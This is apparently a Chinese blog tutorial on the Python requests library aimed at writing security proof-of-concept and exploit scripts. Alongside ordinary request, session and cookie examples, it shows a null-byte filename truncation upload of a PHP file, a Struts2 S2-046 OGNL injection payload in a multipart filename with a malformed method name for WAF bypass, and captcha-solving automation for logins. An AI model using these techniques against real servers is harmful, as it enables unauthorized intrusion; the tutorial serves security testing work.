python requests库用法整理(POC/EXP编写向)

最新推荐文章于 2024-08-09 23:34:20 发布

fnmsd

最新推荐文章于 2024-08-09 23:34:20 发布

阅读量4.7k

点赞数 8

分类专栏：开发文章标签： python

本文链接：https://blog.csdn.net/fnmsd/article/details/79531403

版权

开发专栏收录该内容

3 篇文章 1 订阅

订阅专栏

requests库是python中功能强大的HTTP请求库，可帮助使用者自动进行参数及表单的URL编码。并通过urllib3进行了自动实现Keep-alive和HTTP连接池。可以帮开发者将很多手工实现的地方变为自动。

翻译下官网上的“友爱的特性”：

Keep-Alive & 连接池(Keep-Alive & Connection Pooling)
国际化域名与URL(International Domains and URLs)
基于Cookie的Session保持(Sessions with Cookie Persistence)
浏览器风格的SSL认证(Browser-style SSL Verification)
自动的内容解码(Automatic Content Decoding)
基础/摘要认证（Basic/Digest Authentication）
优雅的Key/Value结构Cookies(Elegant Key/Value Cookies)
自动解压缩（Automatic Decompression）
Unicode形式的响应体（Unicode Response Bodies）
HTTP(S)代理支持（HTTP(S) Proxy Support）
Multipart文件上传（Multipart File Uploads）
流式文件下载（Streaming Downloads）
连接超时配置（Connection Timeouts）
分块请求（Chunked Requests)
.netrc支持（.netrc Support）

本篇介绍日常写POC/EXP中的一些requests的用法及坑点。

基本用法

GET请求

import requests
#这里写一次，后面不再重写
url = 'https://www.anquanke.com/'
headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #burp的代理地址
parameters={'abc':'bc%"\x00d'}
r = requests.get(url, #请求URL
                 params = parameters, #URL参数
                 headers = headers,#请求头设置
                 proxies = proxies,#设置代理服务器，没有需要可以不加
                 verify = False #设置了burp作为代理，会造成证书验证出错报异常，改为False则忽略异常继续请求，同样可以在证书存在问题的HTTPS网站使用。
                )

其中parameter在请求时会自动进行URL编码，

GET /?abc=bc%25%22%00d HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36

如果需要同样的参数名出现多次（比如HTTP参数污染），可以将参数dict中参数名对应的值改为列表,

parameters = {'aaa':['aaa','bbbb']}

这个请自行尝试。

另外，参数也可以写直接在URL中，但写在URL中不会对%&等特殊符号进行URL编码，这个需要注意下。

我们可以通过r.url查看实际请求的URL

url = 'https://www.anquanke.com/?abc=bc\x00%"d&abcd=123'
r = requests.get(url)
print r.url
#https://www.anquanke.com/?abc=bc%00%%22d&abc=123

可以看到URL中的%没有被编码

POST请求

import requests
url = 'https://www.anquanke.com/'
postdata={'a':'a\x00aa"a','b':'bb%bb'}
r = requests.post(url,data=postdata)

提交的报文:

POST / HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 22
Content-Type: application/x-www-form-urlencoded

a=a%00aa%22a&b=bb%25bb

另外，data参数可以直接传入一个构造好的字符串,requests库会直接提交该字符串，不会对其做任何编码处理，有需要不进行URL编码时可以使用。

除了GET/POST请求，同样requests的也自带支持put/delete/head/options等请求方法，这些可以自己尝试一下

3.requests的几种常见的响应属性

import requests
r = requests.get('https://api.github.com/events')
r.content #bytes数据，适用于非文本响应（非文本文件下载、加密传输结果等等）
#b'[{"repository":{"open_issues":0,"url":"https://github.com/...

r.text #将content进行解码后的文本数据，返回Unicode类型文本，适用于文本数据（HTML、TXT等等）。
#u'[{"repository":{"open_issues":0,"url":"https://github.com/...

r.encoding #text使用encoding的编码值进行解码，encoding默认由requests库调用chardet库进行识别，识别错误时可以手工进行修改。
#'utf-8'

r.json() #自动的将内容进行 json code，返回dict或list，适用于响应为JSON
#[{u'repository': {u'open_issues': 0, u'url': 'https://github.com/...

r.headers #响应头
#{'X-XSS-Protection': '1; mode=block', 'Content-Security-Policy': "default-src 'none'"...

r.status_code #响应码
#200

requests使用Session

对于需要访问登陆后页面的，我们需要使用requests的session功能，Session会自动的帮我们追踪Set-Cookie。

下面例子以 Acunetix的在线演示系统，在实验脚本时最好先浏览器看下。

http://testphp.vulnweb.com/cart.php

import requests
s = requests.session() #创建session对象
r = s.get('http://testphp.vulnweb.com/cart.php') #获取购物车
print r.text
#结果包含<p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p>，说明需要登录
r = s.post('http://testphp.vulnweb.com/userinfo.php',data={'uname':'test','pass':'test'})#进行登录
r = s.get('http://testphp.vulnweb.com/cart.php') #获取购物车
print r.text
#源码中包含<a href='logout.php'>Logout test</a>，并包含Total: $0

目前很多登录中会用到验证码，可以配合阿里云验证码识别API进行验证码识别后进行登录，获取验证码同样需要使用session,以安全客的登录为例，安全客整体前端后端分离，登录API即可。

import requests
import json
s = requests.session() #创建session
username='testas34'#随意注册了一个账号
password='test12345'
appcode='xxxxxxxxxxxxxxxxxxxxxxx' #验证码识别的APIkey,具体可以自己去阿里云市场购买https://market.aliyun.com/products/57126001/cmapi014396.html

headers = {'Connection': 'close',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
 } #假装是Chrome浏览器
headers['Referer']='https://www.anquanke.com/login'
img_captcha = s.get('https://api.anquanke.com/data/v1/util/captcha?r=0.27755197669540665',headers=headers)#获取图片验证码,随机数有需要可以自行修改
image_r = requests.post('http://jisuyzmsb.market.alicloudapi.com/captcha/recognize',
                        headers={'Authorization':'APPCODE '+appcode,'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'},
                        data={'type':'en5','pic':img_captcha.content.encode('base64')}
                       )#进行验证码识别
print image_r.json()#验证码识别结果
captcha = image_r.json()['result']['code']
headers['Content-Type']='application/json;charset=UTF-8' #**关键的一步，Content-Type必须设定正确
headers['Origin']='https://www.anquanke.com'
login_data={'username':username,'password':password,'captcha':captcha}
r = s.post('https://api.anquanke.com/data/v1/user/login',headers=headers,data=json.dumps(login_data))#登录
print r.json()
r = s.get('https://api.anquanke.com/data/v1/user/status',headers=headers)#查看登录状态
print r.json()
#{u'isLogin': True, u'user': {u'username': u'testas34', u'nonce': u'929babda60', u'description': u'\u8fd9\u4e2a\u4eba\u592a\u61d2\u4e86\uff0c\u7b7e\u540d\u90fd\u61d2\u5f97\u5199\u4e00\u4e2a', u'email': u'test123@test.com', u'avatar': u'https://p4.ssl.qhimg.com/t010857340ce46bb672.jpg', u'nickname': u'testas34', u'id': 131547}} 取到了登录后的状态信息

requests的session对象可以统一设置一些一些参数，具体如下：

s.headers={'Content-Type':'application/json;charset=UTF-8'} #请求头设置
s.proxies={'https':'http://127.0.0.1:8080'} #请求代理设置
s.verify=False #SSL证书验证设置

就是把平时放到请求函数中的参数直接赋给了session对象。

Stream模式分块读取（大文件下载）

一般利用requests下载文件的过程很简单：

import requests
r = requests.get('https://p0.ssl.qhimg.com/t01dcf171a151ec5398.png')
f = open('logo.png','wb')#注意要用wb模式
f.write(r.content)#非文本文件用content
f.close()

而文件过大，可能导致内存不足时建议使用Stream模式

import requests
r = requests.get('http://zt.bdinfo.net/speedtest/wo3G.rar', stream=True)
f = open("logo.png", "wb")
for chunk in r.iter_content(chunk_size=512):
    if chunk:
        f.write(chunk)
f.close()

文件上传（Multipart编码POST请求）

requests可以很方便的生成文件上传用的Multipart请求，不需要我们手工构造请求包

以截断上传的请求为例：

import requests
postdata = {'test':'test1'}#普通参数
files = {
    'upload':('phpinfo.php\x00',open('phpinfo.php','rb'),'image/png')
}#文件型参数名参数，tuple中依次为文件名、文件内容、文件的Content-Type，不需要Content-Type可以不写
r = requests.post('http://www.anquanke.com',files=files,data=postdata)

生成的请求报文为

POST / HTTP/1.1
Host: www.anquanke.com
Connection: close
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 285
Content-Type: multipart/form-data; boundary=bc335c29888040ea9a820d679d67eee8

--bc335c29888040ea9a820d679d67eee8
Content-Disposition: form-data; name="test"

test1
--bc335c29888040ea9a820d679d67eee8
Content-Disposition: form-data; name="upload"; filename="phpinfo.php口.png"
Content-Type: image/png

<?php phpinfo();
--bc335c29888040ea9a820d679d67eee8--

口的那个位置代表\x00,所要上传的文件需要用rb模式打开，防止以文本模式打开时数据不正确。

Cookies操作

很多POC中我们需要操作Cookies。Response中Cookies可以用dict的形式直接操作

import requests
r = requests.get('https://api.anquanke.com/data/v1/user/status')
print r.cookies #直接输出RequestsCookieJar的形式
#<RequestsCookieJar[<Cookie PHPSESSID=trvut7m5ovga5il8fsp6ahn9s2 for api.anquanke.com/>]>
print dict(r.cookies) #转化为dict输出
#{'PHPSESSID': 'trvut7m5ovga5il8fsp6ahn9s2'}
print r.cookies['PHPSESSID']
#trvut7m5ovga5il8fsp6ahn9s2

请求时可以直接传入dict做为Cookies

import requests
Cookies={'wakaka':'aaaaa','bbbb':'aaaa'}
r = requests.get('https://api.anquanke.com/data/v1/user/status',cookies=Cookies)

抓到的包为

GET /data/v1/user/status HTTP/1.1
Host: api.anquanke.com
Connection: close
Accept: */*
User-Agent: python-requests/2.18.4
Cookie: wakaka=aaaaa; bbbb=aaaa

可以看到Cookies传入了进去。

PS:你也可将Cookies当做一个请求头传入进去，不过不推荐这种方法。

自定义Content-Length与请求方法名

Content-Length头在定义data参数时会自动计算，无法直接进行设置。但是像S2-046的一种利用方法中，却需要设置Content-Length为2GB以上。

同样，如果我们想要将方法名设置为XXXX或者方法前面加空格（比如" POST"）进行WAF绕过时，那么通过直接调用requests的方法就不行了，这时需要通过requests的Request对象进行构造请求。以S2-046的POC为例:

import requests
s = requests.session()
f={'upload':("%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('justatest','23333')}","233333",'text/plain')}
req = requests.Request(' XXXX',"http://www.anquanke.com",files=f)#设置请求方法为" XXXX",此处参数与直接调用get/post等类似
prepped = req.prepare()
prepped.headers['Content-Length']='10000000' #修改已经计算好了的
s.send(prepped)#发送构造好的请求

由于此处在开头加了空格，burpsuite截包会将头上第一个空格、\n等吃掉，此处验证请用wireshark进行抓包。

-抓取到的报文，可以看到:

 XXXX / HTTP/1.1
Host: www.anquanke.com
Accept-Encoding: identity
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=a5ff424949484aa18c82d6e5b2cf4dfa

--a5ff424949484aa18c82d6e5b2cf4dfa
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('justatest','23333')}"
Content-Type: text/plain

233333
--a5ff424949484aa18c82d6e5b2cf4dfa--

一些Tips

设置verify=False时，如果SSL证书有问题，会打印warning，看着很烦人,使用如下代码即可关闭SSL相关的warning信息。
```
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
```
requests会自动follow 30x的转向，需要抓取30x的响应结果，需要在请求方法中设置参数allow_redirects=False

记得平时给请求函数加个timeout参数,单位为秒

r=requests.get('http://www.anquanke.com',timeout=3,allow_directs=False)

比较诙谐的官网官网挂了比较诙谐的一句话：
Requests is the only Non-GMO HTTP library for Python, safe for human consumption.
requests是python仅有非转基因HTTP库，它是可以安全的让人类使用的。

fnmsd

关注

8
点赞
踩
15

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录